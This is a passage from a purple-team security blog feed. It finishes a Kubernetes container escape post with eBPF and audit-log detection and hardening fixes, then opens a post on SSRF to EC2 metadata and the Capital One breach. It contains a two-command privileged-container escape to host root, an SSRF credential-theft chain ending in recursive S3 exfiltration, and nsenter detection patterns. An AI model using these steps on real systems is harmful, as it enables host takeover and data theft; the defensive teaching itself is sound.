# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress
</code></pre>
<pre><code class="" data-line=""># Watch for nsenter executions across all processes on the node
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
  if (str(args-&gt;filename) == &quot;/usr/bin/nsenter&quot; ||
      str(args-&gt;filename) == &quot;/bin/nsenter&quot;) {
    printf(&quot;nsenter called: pid=%d ppid=%d comm=%s\n&quot;,
      pid, curtask-&gt;real_parent-&gt;pid, comm);
  }
}
&#039; 2&gt;/dev/null
</code></pre>
<h3 id="what-kubernetes-audit-logs-show-and-what-they-miss">What Kubernetes Audit Logs Show (and What They Miss)</h3>
<p>Kubernetes audit logs record API server activity. They show pod creation with <code class="" data-line="">--privileged</code> set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.</p>
<pre><code class="" data-line=""># Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: &quot;&quot;
        resources: [&quot;pods&quot;]
    verbs: [&quot;create&quot;, &quot;update&quot;, &quot;patch&quot;]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: &quot;&quot;
        resources: [&quot;pods/exec&quot;]
    verbs: [&quot;create&quot;]
</code></pre>
<pre><code class="" data-line=""># Parse audit log for privileged pod creation
grep &#039;&quot;privileged&quot;:true&#039; /var/log/kubernetes/audit.log | \
  jq -r &#039;[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + &quot;/&quot; + .objectRef.name,
    &quot;privileged=true&quot;
  ] | join(&quot; | &quot;)&#039;

# Or via kubectl (if audit log backend is configured)
kubectl get events -A --field-selector reason=Created \
  -o json | \
  jq -r &#039;.items[] |
    select(.message | contains(&quot;privileged&quot;)) |
    [.metadata.namespace, .involvedObject.name, .message] |
    join(&quot; / &quot;)&#039;
</code></pre>
<p>The audit log gap is important to understand: <strong>audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape</strong>. By the time you see a pod/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.</p>
<hr />
<h2 id="purple-phase-structural-fixes">Purple Phase: Structural Fixes</h2>
<h3 id="fix-1-podsecurity-admission-enforce-restricted-profile">Fix 1: PodSecurity Admission — Enforce Restricted Profile</h3>
<p>PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, <code class="" data-line="">hostNetwork</code>, <code class="" data-line="">hostPath</code> volumes, and requires dropping all capabilities.</p>
<pre><code class="" data-line=""># Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn&#039;t meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest
</code></pre>
<p>What Restricted profile blocks (relevant to escape paths):</p>
<pre><code class="" data-line=""># These settings are REQUIRED by Restricted — apply them explicitly
# to avoid the admission webhook rejecting your workloads

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: [&quot;ALL&quot;]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # add only what is specifically required
      readOnlyRootFilesystem: true  # reduces attacker persistence options

# Pod spec — blocked by Restricted
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not
</code></pre>
<p><strong>Rollout approach for existing clusters:</strong></p>
<p>Start with <code class="" data-line="">warn</code> mode on all namespaces, identify violations, remediate, then promote to <code class="" data-line="">enforce</code>:</p>
<pre><code class="" data-line=""># Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r &#039;.items[] |
    select(.metadata.name | test(&quot;^(kube-system|kube-public|kube-node-lease)$&quot;) | not) |
    .metadata.name&#039; | \
  while read ns; do
    kubectl label namespace &quot;$ns&quot; \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo &quot;Labeled $ns&quot;
  done

# After a deployment cycle, check for warnings in admission logs
# Look for pods that would be rejected under enforce mode
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r &#039;.items[] | select(.message | contains(&quot;violates PodSecurity&quot;))&#039;
</code></pre>
<h3 id="fix-2-runtimeclass-hardware-level-isolation-for-untrusted-workloads">Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads</h3>
<p>For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a hypervisor-level runtime.</p>
<p>gVisor and Kata Containers intercept system calls at a layer between the container and the Linux kernel, so a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.</p>
<pre><code class="" data-line=""># Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: &quot;true&quot;   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor&#039;s sentry
  containers:
    - name: app
      image: untrusted-image:latest
</code></pre>
<pre><code class="" data-line=""># Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu
</code></pre>
<blockquote>
<p><strong>For operators:</strong> gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.</p>
</blockquote>
<h3 id="fix-3-seccomp-profile-block-the-syscalls-that-enable-escape">Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape</h3>
<p>Even without gVisor, a custom seccomp profile that explicitly denies <code class="" data-line="">mount</code>, <code class="" data-line="">unshare</code>, and <code class="" data-line="">clone</code> with namespace flags closes the primary escape syscall surface.</p>
<pre><code class="" data-line="">{
  &quot;defaultAction&quot;: &quot;SCMP_ACT_ERRNO&quot;,
  &quot;architectures&quot;: [&quot;SCMP_ARCH_X86_64&quot;, &quot;SCMP_ARCH_X86&quot;, &quot;SCMP_ARCH_X32&quot;],
  &quot;syscalls&quot;: [
    {
      &quot;names&quot;: [
        &quot;accept&quot;, &quot;accept4&quot;, &quot;access&quot;, &quot;arch_prctl&quot;,
        &quot;bind&quot;, &quot;brk&quot;, &quot;capget&quot;, &quot;capset&quot;,
        &quot;chdir&quot;, &quot;chmod&quot;, &quot;chown&quot;, &quot;clock_gettime&quot;,
        &quot;clone&quot;,
        &quot;close&quot;, &quot;connect&quot;,
        &quot;dup&quot;, &quot;dup2&quot;, &quot;dup3&quot;,
        &quot;execve&quot;, &quot;exit&quot;, &quot;exit_group&quot;,
        &quot;fchmod&quot;, &quot;fchown&quot;, &quot;fcntl&quot;,
        &quot;fstat&quot;, &quot;fstatfs&quot;, &quot;fsync&quot;,
        &quot;futex&quot;, &quot;getcwd&quot;, &quot;getdents64&quot;,
        &quot;getegid&quot;, &quot;geteuid&quot;, &quot;getgid&quot;, &quot;getgroups&quot;,
        &quot;getpeername&quot;, &quot;getpid&quot;, &quot;getppid&quot;,
        &quot;getrlimit&quot;, &quot;getsockname&quot;, &quot;getsockopt&quot;,
        &quot;gettid&quot;, &quot;gettimeofday&quot;, &quot;getuid&quot;,
        &quot;inotify_add_watch&quot;, &quot;inotify_init1&quot;,
        &quot;listen&quot;, &quot;lseek&quot;, &quot;lstat&quot;,
        &quot;madvise&quot;, &quot;mmap&quot;, &quot;mprotect&quot;,
        &quot;munmap&quot;, &quot;nanosleep&quot;,
        &quot;open&quot;, &quot;openat&quot;,
        &quot;pipe&quot;, &quot;pipe2&quot;, &quot;poll&quot;, &quot;ppoll&quot;,
        &quot;prctl&quot;, &quot;pread64&quot;, &quot;pwrite64&quot;,
        &quot;read&quot;, &quot;readlink&quot;, &quot;readv&quot;,
        &quot;recvfrom&quot;, &quot;recvmsg&quot;, &quot;recvmmsg&quot;,
        &quot;rename&quot;, &quot;rt_sigaction&quot;, &quot;rt_sigprocmask&quot;,
        &quot;rt_sigreturn&quot;, &quot;sched_getaffinity&quot;,
        &quot;select&quot;, &quot;sendfile&quot;, &quot;sendmsg&quot;, &quot;sendto&quot;,
        &quot;set_robust_list&quot;, &quot;set_tid_address&quot;,
        &quot;setgid&quot;, &quot;setgroups&quot;, &quot;setuid&quot;,
        &quot;setsockopt&quot;, &quot;shutdown&quot;,
        &quot;socket&quot;, &quot;socketpair&quot;,
        &quot;stat&quot;, &quot;statfs&quot;, &quot;symlink&quot;,
        &quot;tgkill&quot;, &quot;time&quot;, &quot;timerfd_create&quot;,
        &quot;timerfd_settime&quot;, &quot;truncate&quot;,
        &quot;uname&quot;, &quot;unlink&quot;, &quot;unlinkat&quot;,
        &quot;wait4&quot;, &quot;waitid&quot;,
        &quot;write&quot;, &quot;writev&quot;
      ],
      &quot;action&quot;: &quot;SCMP_ACT_ALLOW&quot;
    }
  ]
}
</code></pre>
<p>Apply via pod spec:</p>
<pre><code class="" data-line="">spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: &quot;container-escape-block.json&quot;
      # Profile must be in /var/lib/kubelet/seccomp/ on each node
</code></pre>
<pre><code class="" data-line=""># Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault which blocks ~300 dangerous syscalls)

# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault
</code></pre>
<h3 id="fix-4-network-policy-contain-the-blast-radius-after-escape">Fix 4: Network Policy — Contain the Blast Radius After Escape</h3>
<p>Even if a container escapes to the node, a network policy that prevents the escaped process from reaching the Kubernetes API server limits what the attacker can do with node credentials.</p>
<pre><code class="" data-line=""># Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny
</code></pre>
<pre><code class="" data-line=""># Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed
</code></pre>
<h3 id="fix-5-node-isolation-co-location-risk">Fix 5: Node Isolation — Co-location Risk</h3>
<p>An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node&#8217;s credentials and can pivot to anything else scheduled on that node.</p>
<pre><code class="" data-line=""># Use node selectors, taints, and tolerations to separate workload tiers

# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule
</code></pre>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Legitimate workloads that require &#8211;privileged or hostPID.</strong> CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Baseline or Privileged policy and compensate with Falco detection and node isolation.</p>
<p><strong>Seccomp Restricted blocks some monitoring agents.</strong> The default Restricted seccomp profile blocks several syscalls that APM agents and profiling tools use. Run <code class="" data-line="">strace -c -f ./your-agent</code> to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: <code class="" data-line="">perf_event_open</code> (used by profilers), <code class="" data-line="">ptrace</code> (used by some debuggers), <code class="" data-line="">bpf</code> (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.</p>
<p><strong>runc CVEs require node patching, not policy.</strong> PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (<code class="" data-line="">containerd/containerd</code>) and runc (<code class="" data-line="">opencontainers/runc</code>) specifically.</p>
<p><strong>hostPath volumes are a partial equivalent to &#8211;privileged.</strong> A pod without <code class="" data-line="">--privileged</code> but with a hostPath volume mounting <code class="" data-line="">/etc</code> or <code class="" data-line="">/var/lib/kubelet</code> can read node credentials without needing to mount a block device. PodSecurity Restricted blocks hostPath entirely; Baseline allows it. Audit for hostPath volumes separately from <code class="" data-line="">--privileged</code>.</p>
<p><strong>RuntimeClass with gVisor has syscall compatibility gaps.</strong> Applications that use <code class="" data-line="">io_uring</code>, certain socket options, or kernel modules will not work under gVisor&#8217;s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Escape Path</th>
<th>Precondition</th>
<th>Detection Signal</th>
<th>Structural Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>Privileged container → mount</td>
<td><code class="" data-line="">privileged: true</code></td>
<td>Falco: mount syscall from container; Tetragon: sys_mount kprobe</td>
<td>PodSecurity Restricted enforce; seccomp blocks mount</td>
</tr>
<tr>
<td>hostPID + nsenter</td>
<td><code class="" data-line="">hostPID: true</code></td>
<td>Falco: nsenter exec in container; audit log: pod creation with hostPID</td>
<td>PodSecurity Restricted; blocks hostPID</td>
</tr>
<tr>
<td>hostNetwork + IMDS</td>
<td><code class="" data-line="">hostNetwork: true</code></td>
<td>CloudTrail: IMDSv1 call from unexpected source</td>
<td>Enforce IMDSv2 hop limit 1; PodSecurity Restricted</td>
</tr>
<tr>
<td>runc CVE (CVE-2019-5736)</td>
<td>Unpatched runc</td>
<td>Tetragon: vfs_write to /proc/self/exe</td>
<td>Patch runc/containerd; use RuntimeClass (gVisor)</td>
</tr>
<tr>
<td>hostPath volume mount</td>
<td>hostPath to sensitive path</td>
<td>Falco: sensitive host file access; PodSecurity audit</td>
<td>PodSecurity Restricted (blocks hostPath)</td>
</tr>
<tr>
<td>Escaped → API server</td>
<td>Node credential access</td>
<td>Audit log: API calls from node IP at unexpected time</td>
<td>Network policy blocking node→API server egress</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>Kubernetes container escape</strong> starts at the kernel: <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, and <code class="" data-line="">hostNetwork</code> remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags</li>
<li>Two commands from privileged container to root on the node: <code class="" data-line="">mount /dev/sda1 /mnt/host</code> and <code class="" data-line="">chroot /mnt/host /bin/bash</code> — this is not a sophisticated exploit, it is a default kernel behavior</li>
<li>eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation</li>
<li>PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, <code class="" data-line="">hostNetwork</code>, and hostPath volumes before a pod schedules</li>
<li>runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement</li>
<li>Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>Container escape requires access to a running pod. But what if the attacker didn&#8217;t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.</p>
<p>Get EP09 in your inbox when it publishes → <a href="#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&amp;linkname=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fkubernetes-container-escape-attack-paths%2F&#038;title=Kubernetes%20Container%20Escape%3A%20Attack%20Paths%20and%20eBPF%20Detection" data-a2a-url="https://linuxcent.com/kubernetes-container-escape-attack-paths/" data-a2a-title="Kubernetes Container Escape: Attack Paths and eBPF Detection"></a></p><p>The post <a href="https://linuxcent.com/kubernetes-container-escape-attack-paths/">Kubernetes Container Escape: Attack Paths and eBPF Detection</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/kubernetes-container-escape-attack-paths/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1864</post-id>	</item>
		<item>
		<title>SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach</title>
		<link>https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/</link>
					<comments>https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Mon, 22 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Capital One]]></category>
		<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[IMDS]]></category>
		<category><![CDATA[IMDSv2]]></category>
		<category><![CDATA[SSRF]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1861</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 15</span> <span class="rt-label rt-postfix">minutes</span></span>SSRF to IMDSv1 is a straight line to IAM credentials — Capital One proved it at 100M-record scale. How the attack chain works and why IMDSv2 enforcement is non-negotiable.</p>
<p>The post <a href="https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/">SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 15</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What Is Purple Team?</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 Cloud</a> → <a href="/cloud-security-breaches-2020-2025/">Breach Landscape 2020–2025</a> → <a href="/broken-access-control-aws-cloud/">Broken Access Control</a> → <a href="/mfa-fatigue-attack-uber-okta/">MFA Fatigue</a> → <a href="/cicd-secrets-exposure-supply-chain/">CI/CD Secrets</a> → <strong>SSRF to Cloud Metadata</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>SSRF cloud metadata attack</strong> is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach <code class="" data-line="">169.254.169.254</code> — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication</li>
<li>IMDSv1 (the default before 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials — SSRF anywhere in the stack is sufficient</li>
<li>Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement</li>
<li>IMDSv2 requires a PUT request to obtain a session token first — a CSRF/SSRF-blocked flow — making the IMDS resistant to standard SSRF exploitation; <code class="" data-line="">--http-tokens required</code> is the one-line enforcement</li>
<li>Hop limit of 1 is the container-layer defense: it prevents any process inside a container from reaching IMDS because the TTL expires before the packet traverses the additional network layer</li>
<li>The structural fix is eliminating the credential entirely: <a href="/workload-identity-oidc-service-accounts/">OIDC workload identity eliminates static credentials</a> replaces the attached IAM role with a dynamically issued, scoped token — no IMDS credential to steal</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can&#039;t follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘
</code></pre>
<p>The <strong>SSRF cloud metadata attack</strong> chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.</p>
<hr />
<h2 id="the-incident-capital-one-2019">The Incident: Capital One (2019)</h2>
